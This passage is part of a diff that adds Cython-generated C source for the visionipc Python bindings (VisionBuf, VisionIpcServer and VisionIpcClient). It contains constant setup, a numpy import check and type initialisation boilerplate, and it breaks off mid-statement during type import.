CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_is_connected, 160, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__63)) __PYX_ERR(0, 160, __pyx_L1_error) + + /* "cereal/visionipc/visionipc_pyx.pyx":163 + * return self.client.is_connected() + * + * @staticmethod # <<<<<<<<<<<<<< + * def available_streams(string name, bool block): + * return cppVisionIpcClient.getAvailableStreams(name, block) + */ + __pyx_tuple__64 = PyTuple_Pack(2, __pyx_n_s_name, __pyx_n_s_block); if (unlikely(!__pyx_tuple__64)) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__64); + __Pyx_GIVEREF(__pyx_tuple__64); + __pyx_codeobj__65 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__64, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_cereal_visionipc_visionipc_pyx_p, __pyx_n_s_available_streams, 163, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__65)) __PYX_ERR(0, 163, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__66 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__25, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__66)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_codeobj__67 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__20, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__67)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + __pyx_umethod_PyDict_Type_get.type = (PyObject*)&PyDict_Type; + __pyx_umethod_PyDict_Type_get.method_name = &__pyx_n_s_get; + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_100 = PyInt_FromLong(100); if (unlikely(!__pyx_int_100)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_112105877 = PyInt_FromLong(112105877L); if (unlikely(!__pyx_int_112105877)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_136983863 = PyInt_FromLong(136983863L); if (unlikely(!__pyx_int_136983863)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_184977713 = PyInt_FromLong(184977713L); if (unlikely(!__pyx_int_184977713)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_222419149 = PyInt_FromLong(222419149L); if (unlikely(!__pyx_int_222419149)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_228825662 = PyInt_FromLong(228825662L); if (unlikely(!__pyx_int_228825662)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_238750788 = PyInt_FromLong(238750788L); if (unlikely(!__pyx_int_238750788)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + /* AssertionsEnabled.init */ + __Pyx_init_assertions_enabled(); + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + /* NumpyImportArray.init */ + /* + * Cython has automatically inserted a call to _import_array since + * you didn't include one when you cimported numpy. To disable this + * add the line + * numpy._import_array + */ +#ifdef NPY_FEATURE_VERSION +#if !NO_IMPORT_ARRAY +if (unlikely(_import_array() == -1)) { + PyErr_SetString(PyExc_ImportError, "numpy.core.multiarray failed to import " + "(auto-generated because you didn't call 'numpy.import_array()' after cimporting numpy; " + "use 'numpy._import_array' to disable if you are certain you don't need it)."); +} +#endif +#endif + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_OrderedDict = Py_None; Py_INCREF(Py_None); + __Pyx_EnumBase = Py_None; Py_INCREF(Py_None); + __Pyx_FlagBase = Py_None; Py_INCREF(Py_None); + __pyx_collections_abc_Sequence = Py_None; Py_INCREF(Py_None); + generic = Py_None; Py_INCREF(Py_None); + strided = Py_None; Py_INCREF(Py_None); + indirect = Py_None; Py_INCREF(Py_None); + contiguous = Py_None; Py_INCREF(Py_None); + indirect_contiguous = Py_None; Py_INCREF(Py_None); + __Pyx_globals = ((PyObject*)Py_None); Py_INCREF(Py_None); + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + __pyx_vtabptr_6cereal_9visionipc_13visionipc_pyx_VisionBuf = &__pyx_vtable_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + __pyx_vtable_6cereal_9visionipc_13visionipc_pyx_VisionBuf.create = (PyObject *(*)(VisionBuf *))__pyx_f_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_create; + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf)) __PYX_ERR(0, 31, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf_spec, __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf = &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf->tp_dictoffset && __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf, __pyx_vtabptr_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_VisionBuf, (PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf) < 0) __PYX_ERR(0, 31, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer)) __PYX_ERR(0, 63, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer_spec, __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer) < 0) __PYX_ERR(0, 63, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer = &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer) < 0) __PYX_ERR(0, 63, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_dictoffset && __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_VisionIpcServer, (PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer) < 0) __PYX_ERR(0, 63, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer) < 0) __PYX_ERR(0, 63, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient_spec, NULL); if (unlikely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient)) __PYX_ERR(0, 97, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient_spec, __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient) < 0) __PYX_ERR(0, 97, __pyx_L1_error) + #else + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient = &__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient) < 0) __PYX_ERR(0, 97, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dictoffset && __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_VisionIpcClient, (PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient) < 0) __PYX_ERR(0, 97, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient) < 0) __PYX_ERR(0, 97, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)(&PyType_Type)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype___Pyx_EnumMeta = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__Pyx_EnumMeta_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_ptype___Pyx_EnumMeta)) __PYX_ERR(1, 16, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__Pyx_EnumMeta_spec, __pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #else + __pyx_ptype___Pyx_EnumMeta = &__Pyx_EnumMeta; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_ptype___Pyx_EnumMeta->tp_dealloc = (&PyType_Type)->tp_dealloc; + __pyx_ptype___Pyx_EnumMeta->tp_base = (&PyType_Type); + __pyx_ptype___Pyx_EnumMeta->tp_new = (&PyType_Type)->tp_new; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype___Pyx_EnumMeta->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype___Pyx_EnumMeta->tp_dictoffset && __pyx_ptype___Pyx_EnumMeta->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype___Pyx_EnumMeta->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype___Pyx_EnumMeta) < 0) __PYX_ERR(1, 16, __pyx_L1_error) + #endif + __pyx_vtabptr_array = &__pyx_vtable_array; + __pyx_vtable_array.get_memview = (PyObject *(*)(struct __pyx_array_obj *))__pyx_array_get_memview; + #if CYTHON_USE_TYPE_SPECS + __pyx_array_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_array_spec, NULL); if (unlikely(!__pyx_array_type)) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_array_type->tp_as_buffer = &__pyx_tp_as_buffer_array; + if (!__pyx_array_type->tp_as_buffer->bf_releasebuffer && __pyx_array_type->tp_base->tp_as_buffer && __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_array_type->tp_as_buffer->bf_releasebuffer = __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_array_spec, __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #else + __pyx_array_type = &__pyx_type___pyx_array; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_array_type->tp_print = 0; + #endif + if (__Pyx_SetVtable(__pyx_array_type, __pyx_vtabptr_array) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_MemviewEnum_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_MemviewEnum_spec, NULL); if (unlikely(!__pyx_MemviewEnum_type)) __PYX_ERR(1, 302, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_MemviewEnum_spec, __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #else + __pyx_MemviewEnum_type = &__pyx_type___pyx_MemviewEnum; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_MemviewEnum_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_MemviewEnum_type->tp_dictoffset && __pyx_MemviewEnum_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_MemviewEnum_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + __pyx_vtabptr_memoryview = &__pyx_vtable_memoryview; + __pyx_vtable_memoryview.get_item_pointer = (char *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_get_item_pointer; + __pyx_vtable_memoryview.is_slice = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_is_slice; + __pyx_vtable_memoryview.setitem_slice_assignment = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_slice_assignment; + __pyx_vtable_memoryview.setitem_slice_assign_scalar = (PyObject *(*)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_setitem_slice_assign_scalar; + __pyx_vtable_memoryview.setitem_indexed = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_indexed; + __pyx_vtable_memoryview.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryview_convert_item_to_object; + __pyx_vtable_memoryview.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryview_assign_item_from_object; + __pyx_vtable_memoryview._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryview__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_memoryview_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryview_spec, NULL); if (unlikely(!__pyx_memoryview_type)) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryview_type->tp_as_buffer = &__pyx_tp_as_buffer_memoryview; + if (!__pyx_memoryview_type->tp_as_buffer->bf_releasebuffer && __pyx_memoryview_type->tp_base->tp_as_buffer && __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_memoryview_type->tp_as_buffer->bf_releasebuffer = __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryview_spec, __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #else + __pyx_memoryview_type = &__pyx_type___pyx_memoryview; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryview_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryview_type->tp_dictoffset && __pyx_memoryview_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryview_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryview_type, __pyx_vtabptr_memoryview) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + __pyx_vtabptr__memoryviewslice = &__pyx_vtable__memoryviewslice; + __pyx_vtable__memoryviewslice.__pyx_base = *__pyx_vtabptr_memoryview; + __pyx_vtable__memoryviewslice.__pyx_base.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryviewslice_convert_item_to_object; + __pyx_vtable__memoryviewslice.__pyx_base.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryviewslice_assign_item_from_object; + __pyx_vtable__memoryviewslice.__pyx_base._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryviewslice__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)__pyx_memoryview_type); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 952, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_memoryviewslice_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryviewslice_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_memoryviewslice_type)) __PYX_ERR(1, 952, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryviewslice_spec, __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #else + __pyx_memoryviewslice_type = &__pyx_type___pyx_memoryviewslice; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryviewslice_type->tp_base = __pyx_memoryview_type; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryviewslice_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryviewslice_type->tp_dictoffset && __pyx_memoryviewslice_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryviewslice_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryviewslice_type, __pyx_vtabptr__memoryviewslice) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __pyx_t_1 = PyImport_ImportModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_t_1)) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_7cpython_4type_type = __Pyx_ImportType_3_0_0(__pyx_t_1, __Pyx_BUILTIN_MODULE_NAME, "type", + #if defined(PYPY_VERSION_NUM) && PYPY_VERSION_NUM < 0x050B0000 + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #elif CYTHON_COMPILING_IN_LIMITED_API + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #else + sizeof(PyHeapTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyHeapTypeObject), + #endif + __Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_7cpython_4type_type) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyImport_ImportModule("numpy"); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 202, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_5numpy_dtype = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "dtype", sizeof(PyArray_Descr), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArray_Descr),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_dtype) __PYX_ERR(2, 202, __pyx_L1_error) + __pyx_ptype_5numpy_flatiter = __Pyx_ImportType_3_0_0(__pyx_t_1, 